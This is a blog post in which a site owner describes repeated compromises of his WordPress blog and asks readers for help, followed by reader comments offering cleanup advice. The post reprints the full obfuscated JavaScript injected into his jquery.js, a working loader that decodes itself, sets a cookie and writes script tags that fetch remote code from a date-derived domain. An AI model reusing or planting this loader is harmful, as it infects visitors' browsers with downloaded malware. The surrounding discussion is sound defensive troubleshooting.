Help needed – War to hackers
You know this blog has been attacked several times by hackers (or crackers, call them whatever you want, I can’t tell you how would I call them).
I tried everything, such as 10 ways to secure your WordPress blog and changing the hosting.
Attacks continue, with injection of malicious code in javascript files.
I had my hotsing service, HostGator, monitoring the activity on the blog and they said “We found a few PHP shells on your account and removed this. This indicates that you have insecure scripts on your account. Please review each script and esure that you are running the latest versions”.
Obviously I am running the latest versions of everything, so I really do not know how to prevent the site for being hacked almost every day.
That’s why I need you… I am not a security expert but maybe some of you are.
I need some hints and tips about finding this insecure script and removing it once for all.
I will update this post with all information you need.
If you are a security pro, I can pay for your service or can give you a lifetime ad somewhere in the blog (but I’d prefer to pay :))
UPDATE #1
The blog has been attacked again. Look how did the modify jquery.js file
And this is the injected code
$a="Z64zZ3dZ22Z2566uZ256ecZ2574ionZ2520Z2564w(Z2574Z2529Z257bcaZ253dZ2527Z252564Z25256fcuZ25256denZ252574Z252eZ252577ritZ252565(Z25252Z2532Z2527;Z2563eZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscZ252572iZ2525Z2537Z2530Z2574Z252520Z25256cZ252561Z256egZ252575Z252561Z2567eZ25253dZ25255cZ252522jZ2561vasZ252563rZ2569Z2570Z252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscriZ252570tZ25253eZ2527;evaZ256c(uZ256eZ2565Z2573Z2563apeZ2528t))Z257d;Z22;czZ3dZ22Z2566uncZ2574ioZ256e cZ257a(czZ2529Z257brZ2565tuZ2572n Z2563Z2561+Z2563b+cZ2563Z252bcdZ252bce+Z2563z;}Z253bZ22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;ceZ3dZ223harZ2543odZ2565AtZ2528Z2530Z2529^(Z25270Z257800Z2527+eZ2573)))Z253b}}Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;stZ3dZ22Z2573tZ253dZ2522Z2524aZ253dsZ2574;Z2564Z2563sZ2528Z2564Z2561Z252bdZ2562Z252bZ2564cZ252bdZ2564+Z2564eZ252cZ2531Z2530Z2529;Z2564Z2577Z2528sZ2574)Z253bsZ2574Z253d$Z2561;Z2522;Z22;cdZ3dZ22dst+Z2553trZ2569ng.Z2566Z2572omZ2543hZ2561Z2572Z2543oZ2564e((Z2574Z256dp.Z256Z22;caZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564csZ2528dsZ252cesZ2529Z257bdsZ253dunZ2565scaZ257Z22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564Z2563Z2573(cZ2575Z252cZ2531Z2534Z2529);Z2522;Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;dfZ7bl;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;cbZ3dZ220Z2565(Z2564s)Z253bstZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0;iZ253cds.lZ256Z22;ccZ3dZ225nZ2567th;Z2569++)Z257btmZ2570Z253dds.sZ256cicZ2565(i,Z2569+1)Z253bstZ253Z22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;Z69Z66 Z28Z64oZ63Z75menZ74.coZ6fkiZ65Z2eindZ65xOfZ28Z27rZ665Z66Z36dsZ27)Z3dZ3d-1)Z7bfuZ6ecZ74Z69oZ6e Z63aZ6clbZ61cZ6b(Z78)Z7bwinZ64ow.Z74w Z3d Z78;vZ61Z72 dZ20Z3d Z6eew Z44Z61te(Z29Z3bdZ2eZ73Z65tZ54Z69mZ65Z28x[Z22as_Z6fZ66Z22]Z2a100Z30)Z3bZ76arZ20h Z3d Z64.geZ74Z55TZ43HZ6fZ75Z72Z73Z28)Z3bwZ69nZ64Z6fZ77.h Z3d hZ3bZ69Z66Z20(Z68 Z3e Z38)Z7bZ64Z2esetZ55TCZ44atZ65(d.Z67eZ74Z55TCDZ61Z74e(Z29 Z2d 2)Z3b}Z65lsZ65Z7bdZ2esetZ55TCZ44atZ65(dZ2egZ65tUZ54CDZ61te(Z29 - Z33)Z3bZ7dwinZ64Z6fZ77Z2eZ67dZ20Z3d Z64;vaZ72 tiZ6de Z3dZ20nZ65Z77Z20ArrZ61y()Z3bvarZ20sZ68iftZ49Z6edeZ78 Z3d Z22Z22;tiZ6de[Z22yeZ61rZ22] Z3d d.gZ65tZ55Z54CZ46uZ6clZ59eZ61rZ28);tZ69Z6deZ5bZ22montZ68Z22] Z3d d.Z67eZ74Z55Z54Z43MonZ74hZ28Z29Z2b1;tZ69me[Z22dZ61yZ22] Z3d d.Z67etZ55TCDZ61teZ28)Z3bZ69fZ20(d.Z67etZ55Z54Z43MZ6fZ6eth(Z29+Z31 Z3c 10)Z7bshiZ66tIZ6edZ65xZ20Z3d timeZ5bZ22yeaZ72Z22] +Z20Z22-0Z22 + (Z64.gZ65tUTZ43MonZ74h(Z29+1)Z3bZ7deZ6csZ65Z7bshiftIZ6eZ64eZ78Z20Z3d tiZ6deZ5bZ22yZ65arZ22] + Z22-Z22 +Z20(d.Z67etZ55TCZ4donZ74h()Z2b1Z29;}iZ66 (Z64.geZ74UTCZ44ateZ28) Z3c Z310)Z7bsZ68iftZ49ndZ65x Z3dshiZ66tInZ64ex Z2b Z22-0Z22 Z2b dZ2egZ65Z74UTCZ44aZ74Z65(Z29;Z7delsZ65Z7bshiftIZ6edeZ78 Z3d Z73hifZ74IndZ65Z78 +Z20Z22Z2dZ22 + dZ2egetZ55Z54Z43DaZ74e()Z3bZ7ddZ6fZ63umZ65Z6etZ2eZ77Z72Z69Z74e(Z22Z3cscrZ22+Z22iptZ20lanZ67uaZ67eZ3djZ61vZ61sZ63riZ70tZ22+Z22 sZ72Z63Z3dZ27htZ74pZ3aZ2fZ2fsearch.tZ77Z69tZ74eZ72.cZ6fmZ2ftrZ65nZ64Z73Z2fZ64aiZ6cy.jZ73oZ6e?dZ61teZ3dZ22+ sZ68ifZ74InZ64Z65x+Z22&caZ6clbZ61cZ6bZ3dcallZ62Z61cZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iZ70tZ3eZ22);}Z20Z66Z75nctZ69oZ6eZ20cZ61lZ6cbacZ6bZ32Z28xZ29Z7bwindZ6fZ77Z2etwZ20Z3d x;scZ28Z27rf5Z666dsZ27,Z32,7Z29Z3bevZ61Z6cZ28uZ6eZ65scZ61Z70Z65(dZ7aZ2bcz+Z6fp+sZ74Z29Z2bZ27dw(dZ7a+Z63z(Z24a+sZ74));Z27Z29Z3bdZ6fcumZ65Z6eZ74.Z77ritZ65($aZ29Z3b}dZ6fcZ75menZ74.wZ72Z69te(Z22Z3cimg Z73rcZ3dZ27httZ70:Z2fZ2fseaZ72Z63h.tZ77ittZ65rZ2ecoZ6dZ2fimagZ65Z73Z2fsearcZ68Z2frZ73s.pZ6egZ27 widtZ68Z3d1 heiZ67htZ3d1 sZ74yleZ3dZ27visibZ69litZ79Z3aZ68iZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt lZ61ngZ75ageZ3djavZ61Z73Z63rZ69ptZ22+Z22 srZ63Z3dZ27httpZ3aZ2fZ2fsearch.twZ69Z74terZ2ecZ6fmZ2ftrendZ73Z2fdailZ79.Z6asoZ6e?cZ61Z6clbZ61Z63kZ3dcallbZ61cZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}eZ6csZ65Z7b$aZ3dZ27Z27};fZ75nZ63tioZ6e scZ28Z63nm,Z76,eZ64Z29Z7bvar Z65xdZ3dnew Z44Z61te(Z29Z3beZ78d.sZ65Z74DZ61teZ28eZ78d.Z67eZ74Z44ateZ28)+eZ64Z29;doZ63Z75Z6dZ65nZ74.cZ6foZ6bieZ3dcnmZ2bZ20Z27Z3dZ27 +escape(Z76)Z2bZ27;eZ78pZ69rZ65sZ3dZ27+eZ78dZ2eZ74Z6fGZ4dTStZ72iZ6eg()Z3b}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));
Rate this post: 
(3 votes, average: 5.00 out of 5)
(3 votes, average: 5.00 out of 5)
Loading ...
WordPress themes are designs for WordPress - one of the most popular blogging software nowadays.
You will be pleasantly surprised by WordPress Themes provided by Template Monster. All of them are of professional design and high quality.
You will be pleasantly surprised by WordPress Themes provided by Template Monster. All of them are of professional design and high quality.
Be my fan on Facebook and follow me on Twitter! Exclusive content for my Facebook fans and Twitter followers
This post has 42 comments
Chris
Hey. If you’re running 3rd Party Application they might have malicious code or code that isn’t fully validating the user input.
If you have uploads or whatever else on your blog, it might be the same.
Also be sure to have the lates WP Version, since there are many sites spreading security holes and they are having crawlers searching for those sites with these versions.
Just never trust the user.
I’ve been wondering why Mozilla was saying that the site was malicious anyway.
If you could give more information, it would be useful.
Hope I could help a bit.
Greetz,
Chris
niraj
big fan of your blog
do you use windows OS and filezilla as ftp client i had the same problem (iframe and script) injection due to filezilla
Emanuele Feronato
@chris: I have some plugins, I can list them all if you need
@niraj: yes, I have filezilla and various windows OS (XP, vista and 7) on the computers I use to manage the blog.
Nick
One of the plugins can have a leak.
Emanuele Feronato
OK I’ll list my plugins. Meanwhile I got another attack
Chris
I’ll look into it when I’m back at home. Sitting in the train now ;)
But looks really like some malicious assembler code that they try to run.
I’ll take a look at it. Also you could send me a mail with your plugins and wp version so I can check out which of those may be the problem (and check the dark site of the web for exploits).
Greetz
Chris
Btw..In the meantime, try loading jQuery from the google servers so you don’t have to have it locally.
Maybe that will at least stop this exploit till I or someone finds the problem
Chris
Okay it seems it’s the
HTML/Crypted.Gen
I also could find many threads concerning the same problem.
Most of them tend to change ftp password and for wordpress this link:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
Maybe someone find out your password due to using the same password as for the ftp on some untrusted sites..
Since I really can’t imagine how they could change files on the ftp rather then having the password or having a bad hoster.
niraj
dear Emanuele
some bad guys/programs were able to get in and get the password stored in filezilla (Every ftp info we type in filezilla gets stored somewhere it later shows the list when we click on the arrow button)
I was able to get rid of the attack by
1) manually removed all the injected scripts
2) change the ftp password
3) never used filezilla again as ftp client i switched to cuteftp
and one thing i noticed was the hackers used to inject files in regular time frame like once in 2 hours , 5 hours or once a day
mel
Hi. I’m not a security expert, but this sounds just like the kind of problem we had at work half a year ago.
This was the problem:
1. we received a mail from our ISP telling that they found some malicious stuff on our server.
2. we checked, and it was true, some files had some weird code added into them, very similar to the stuff I see in jquery.js
3. deleting these lines didn’t help, since they appeared back again and also in different files.
I had to look into this. This is what I found:
To get right to the point, the reason the server was infested was because none of the PCs at work had virus protection lol. The problem was, that one computer, that had access to server (had username/password stored) was infested with a trojan horse. So what did this trojan do? It connected to the servers it had the passwords for and started infesting files it found on the server, mainly php files in this case..
So basicly all the servers that I had stored usernames/passwords for in FireFTP or CuteFTP, were infected as I later found out. ouch!
niraj mentioned iFrame, we had something to do with that as I remember, the trojan adding weird lines between iFrame tags if I remember right.
How to get rid of this:
1. scan all the computers that have access to server or change the server user/pass and scan your computer
2. i suggest doing an online scan! TrendMicro free online scan: http://us.trendmicro.com/us/housecall/
3. when you are clean, I would change the server user/pass again
4. now the server – what I did was remove the virus by hand (deleted the lines in the files in notepad), but I suggest you follow the tutorial Chris posted. the point is to get rid of all the trojan added lines in your server files – either do it by hand or with a virus protection
my employer went and bought protection for all computers after that, that was a good lesson for him :)
always use virus protection on your computer! Remember that supposedly around 80% of anti-virus programs that are cracked and downloaded from the web, have trojan viruses already in them!
hope this helps, you have helped me a lot :)
Chris
As mentioned before the attacker must have had direct control over the ftp or control over some plugins that had upload privileges.
Or he just had a way to upload a prepared PHP file which he can use as FTP client.
Therefor he can do all the things you could do -> execute Shell cmds, Upload/Download stuff, getting the password of the Database and maybe aswell for the FTP.
Some options:
- Try to detect and delete ALL backdoors he has opened. That’s kinda hard, since you can’t be sure
- Fresh-Install with the newest version use working backup (though you might not have backups or you can’t be sure they are clean).
Also as niraj mentioned: AntiVir-Tools! Surfing without it is just insane.
But I’m sure you are using some kind of, so I don’t want to tell you not to use *.exe from people and sites you don’t really know ;)
Hopefully you can get rid of those scriptkiddies..
Ramon Fritsch
Hey man, there is a little trick to sure that files won’t be modified. Just disable the write permissions. try to remove all write permissions from .js or .css files.
Emanuele Feronato
thank you to everybody.
I have McAfee Security Center installed, obviously an original registered version.
Now I am scannin the PC with HouseCall, I’ll update you when done.
VideoGuy
Have you ever considered switching to a CMS besides WordPress? Or even making your own? For the low amount of features in WordPress that you actually use, I think it may be worth making your own system for posts. That way the exploits wouldn’t be very well known.
Concerned User
I can help. Email me please.
Chris
I wouldn’t recommand that, since that would take much time and most selfmade stuff isn’t secure enough (because people forget to validate and sanitize data…).
@Ramon: That won’t protect it from being exchanged or modified if the cracker has the FTP password.
George
I don’t understand why bad people atacks your website. Anyway i hope you solve security problems.
This is the best blog ever.
Regards,
George
Niall
Macafee is your first mistake, haha. Slow, bloated, overall not very good in my opinion, Avira Antivir all the way.
Change your jQuery src to Google API’s one – http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js – preventing more injection and commonly used so it’s likely it’ll decrease load time as it’s already in the user’s cache.
Guest
i think your problem is WordPress… since it’s open source, it has a lot of exploits, some are fixed others are not even known yet, and the hackers find new exploits every day…
AnotherGuest
Maybe screaming “My website is being attacked because it has security issues that I can’t figure out” is not the best way to avoid being attacks even more ?
Just a thought…
Darryl
It looks like it could be a plugin or even the host isn’t performing right in the security. Why don’t you change the file CHMOD, to make it unaccesible? Maybe that could stop the idiots hacking you.
Andrew J
im no expert. but id guess that listing a load of information about the blog could make it even easier to hack
KrazyBig
Is this a SQL injection attack or file modification? If it is the latter, you should be able to chmod the permissions on the WordPress directories to prevent the modification of files. I used to have a few problem with hacks on some of my sites but since making that change, I haven’t had any issues.
brainstormingin
Hi,
Sorry to hear that your blog is being hacked. I am no security expert but similar problem happened to me on one of my game sites made in wordpress. I downloaded my whole site to my local drive. Then I scanned every file like php and css and js and removed the encoded functions stored by the hackers. Online I deleted all the files in my web directory. I installed a fresh copy of the latest wordpress with latest versions of the plugins I use. Then from online file manager I uploaded required files like themes and uploads folders. I had to reconfigure some settings. :( . There is a security hole in the commenting system in wordpress I guess. So I had to disable user comments. I think you should change your ftp software. Never store any password in any program on your computer. These programs might have security leaks which can be exploited. I use Kaspersky internet security and its good.
I have learnt a lot from your blog and tutorials.
Wish your all the best.
Andrea
Upgrade to the latest version of wordpress
Change FTP login and password
Check if the plugins have bugs
The gates of the site to scan for open ports from backdoor
gamesloop
Hi Emanuele
I decoded that string. It a bunch of java and php code, but I don’t know any of these languages. I used flash to decode it.
My advice is to disable the Eval() function. It’s used a lot of times, over and over again until the whole code is recreated to it’s original state , after witch it is executed
Astro75
Now you have trojans.
2009.12.11 15:53:02 http://www.emanueleferonato.com/wp-content/themes/silhouette-3column/easytabs.js Firefox Denied: Trojan-Downloader.JS.Twetti.a
Emanuele Feronato
some quick info:
1) CHMODding the files did not stop attacks
2) Sometimes the FTP time does not even change
3) My computer is clean, but I have to admit I used a password that’s not unique in all accounts I registered around the web… I am going to change it with a new, unique one, and we’ll see what happens.
Chris
CHMOD will only change the permission of the files…But if the hacker has the FTP Login, it’s useless.
If he is using other plugins that need 777 CHMOD, Emanuele can’t change it or the plugin won’t work.
Also people read what others have suggested already…I think everything has been said now at least twice.
Emanuele, didn’t you want to list up the plugins you’re using and WP Version? You can also try to hack yourself: Search the exploits (i.e. milw0rm.com) that fit your version and try them. If you have success, you know you have either to upgrade or fix it on your own. (mostly these are blind SQL injections in some parts when wp or a plugin isn’t escaping the userinput).
I hope you can get rid of those attacks soon.
Emanuele Feronato
My plugins are:
Akismet Version 2.2.6
MobilePress Version 1.1.3
Multi Column Category Version 1.0
WordPress Exploit Scanner version 0.7
WordPress Firewall version 1.25
WP-PostRatings version 1.50
WP-Syntax Syntax version 0.9.8(without “test” directory that can be exploited)
WP Extra Template Tags version 0.4
WP Page Numbers version 0.5
WP Security Scan version 2.7.1.2
Avi
I posted my earlier comments in the wrong post. Apologies. However our offer still stands. Do let us know if you need our help.
PA
Recently my site was also affected with a similar stuff.I was using Filezilla FTP ,Windows OS
IMPORTANT -> Stop using FileZilla or any other FTP to access your websites for some time.
1) Contact your hosting support,provide them with the exact code & ask them to search for the code in all your files,especially .js files in plugin folder.
2) Change all your passwords – FTP,Mail,Logins -everything
3) Ask the support for FTP access logs(they have access,if you are on shared hosting)& look for previous login attempt from IP other than yours.
4) If you find a login is made from that specific IP in your FTP log ,even after changing password,change it once again!!
In such cases,your hosting support must co-operate with you, in eliminating all this.
Andrea
I check your server, there are too many open ports, including a port running a service unknown
Mike Duguid
I’ve seen a similar issue where a PC was infected with a gumblar variant (up to date AV didn’t recognise!) which sniffed ftp details. The outgoing data also bypassed a firewall by attaching to an svchost instance. So don’t be too sure a quick scan will give you an ‘all clear’ for this route of vulnerability. The way to -know- and not -guess- how the attack is happening is to check server logs against modification time of infected files and correlate users/ips/access at that time. Once you -know- how the attack happened you can sort it rather than stumbling from one ineffective solution to another. I’ll reiterate again – don’t use shared hosting (shared hosting is a complete waste of time for professional use – can’t modify firewall rules e.g lock ftp to your own, often can’t get access to ftp logs, change apache/ftp users permission, no sftp or ssh etc etc).
Mike Duguid
Andrea, he’s running on a hostgator host – he cannot make changes to the overall server config that would make any difference, and it’d be unlikely that a shared server with 1000′s of people on it has been rooted. I’d take the hostgator advice with a pinch of salt, it’s a standard canned reply, the tier of support staff you will deal with at large companies like this haven’t the knowledge or time to really get to the bottom of the cause.
sandro
try this
http://www.evilsocket.net/764/wp-sentinel-pubblicato.html
Emanuele Feronato
I changed the FTP password and never used the FTP since then, but attacks continue.
I think there is a unsanitized PHP executing scripts… but I can’t find it…
Vadersapien
If you never get to find it, I think the best thing to do would be delete everything on the server(maybe keep MySQL tables), and restore from a backup…although that PHP file might have existed when you hosted the site on the other server, explaining why the attacks carried over between servers…
Mike Duguid
If you’re sure it’s not via ftp scan your http access logs and correlation of those with file modification times is the next step.
Badim
oh man, i get same attack few weeks ago.
what you HAVE to ad – as Vadersapien said:
purge your http directory, upload latest installation of WP and connect them to your MySQL tables. Or restore backup BEFORE(you have to be 100% sure) your http was modified.
how this attacks works:
you lost your password to TrojanX, TrojanX sent all ftp info to special serverY, and leaved php file for case if you will change pass. Server Y each day each time trying to Do same Script for each access that it has, if access is not working, it will try PhP file, if not – attacks will probably stops.
this all process is auto-matic. so it have to be not personal stuff, just some hazkers doing what they can to get extra $ =(
Jafar
Try using N-Stalker to search for threats. It’ s really a good program :)
Emanuele Feronato - italian geek and PROgrammer
[...] you should know if you are an old time reader, this blog has been hacked several times with malicious script [...]